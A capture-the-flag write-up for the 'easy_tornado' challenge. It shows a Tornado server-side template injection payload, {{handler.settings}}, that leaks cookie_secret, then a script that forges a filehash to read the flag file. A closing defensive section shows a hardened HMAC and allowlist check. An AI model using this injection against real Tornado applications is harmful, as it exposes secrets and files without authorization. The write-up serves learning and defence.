Vulnerability reproduction: easy_tornado
2022-07-07 08:10:00 【_ s1mple】
[ Environment ]
windows
[ Tools ]
Firefox
[ Steps ]
Tornado is a web application framework for Python.
Opening the challenge shows three files:

flag.txt
/flag.txt
flag in /fllllllllllllag
So the flag is in the file /fllllllllllllag.
welcome.txt
/welcome.txt
render
render is a rendering function in Python: it renders variables into a template, so different pages can be produced by passing different parameters.
hints.txt
/hints.txt
md5(cookie_secret+md5(filename))
filehash=md5(cookie_secret+md5(filename)). Here filename=/fllllllllllllag, so we only need to know cookie_secret to access the flag.
After testing, I found another interface, error, in the format /error?msg=Error. Server-side template injection (SSTI) is suspected.
Try /error?msg={{datetime}}. In Tornado's page templates, datetime refers to Python's datetime module. Tornado provides a number of object aliases for quick access to objects; see the official Tornado documentation.

Looking through the documentation shows that cookie_secret lives in the settings attribute of the Application object, and that self.application.settings has an alias:
RequestHandler.settings
An alias for self.application.settings.
handler refers to the RequestHandler object that handles the current page. RequestHandler.settings points to self.application.settings, so handler.settings points to RequestHandler.application.settings.
Construct a payload to obtain cookie_secret:
/error?msg={{handler.settings}}
'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
Calculate the filehash value:
import hashlib

def md5(s):
    # hashlib works on bytes, so encode the str input first
    return hashlib.md5(s.encode()).hexdigest()

def filehash():
    filename = '/fllllllllllllag'
    cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
    # filehash = md5(cookie_secret + md5(filename)), as given in hints.txt
    print(md5(cookie_secret + md5(filename)))

if __name__ == '__main__':
    filehash()
payload:
file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(/fllllllllllllag))
The flag is obtained successfully.
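The file-access check from hints.txt seen from the server side, next to a hardened variant, as an added example that is not part of the original write-up or the challenge's code. SECRET, PUBLIC_FILES, /private.txt and all function names are constructed for illustration, and legacy_check is an assumed model of how the server compares the hash.

```python
import hashlib
import hmac

# Constructed sample values; not the secret or the paths from the challenge.
SECRET = b"constructed-demo-secret"
PUBLIC_FILES = {"/welcome.txt", "/hints.txt"}  # hypothetical allowlist


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def hint_filehash(secret: bytes, filename: str) -> str:
    """The scheme from hints.txt: md5(cookie_secret + md5(filename))."""
    return md5_hex(secret + md5_hex(filename.encode()).encode())


def legacy_check(secret: bytes, filename: str, filehash: str) -> bool:
    """Assumed model of the check: any path with a matching hash is served."""
    return filehash == hint_filehash(secret, filename)


def hardened_sign(secret: bytes, filename: str) -> str:
    """HMAC-SHA256 over the filename instead of nested MD5."""
    return hmac.new(secret, filename.encode(), hashlib.sha256).hexdigest()


def hardened_check(secret: bytes, filename: str, token: str) -> bool:
    """Allowlist first, then a constant-time comparison of the token."""
    if filename not in PUBLIC_FILES:
        return False  # a valid token never widens what can be read
    return hmac.compare_digest(token, hardened_sign(secret, filename))


def demo() -> dict:
    # Whoever holds the secret can produce a valid token for any path.
    private = "/private.txt"  # constructed stand-in for a non-public file
    public = "/hints.txt"
    return {
        "legacy_private": legacy_check(SECRET, private, hint_filehash(SECRET, private)),
        "hardened_private": hardened_check(SECRET, private, hardened_sign(SECRET, private)),
        "hardened_public": hardened_check(SECRET, public, hardened_sign(SECRET, public)),
        "hardened_bad_token": hardened_check(SECRET, public, "0" * 64),
    }


if __name__ == "__main__":
    print(demo())
```

The allowlist is what keeps a leaked cookie_secret from exposing other files. The underlying fix is still to pass msg to the template as a variable instead of rendering it as template source.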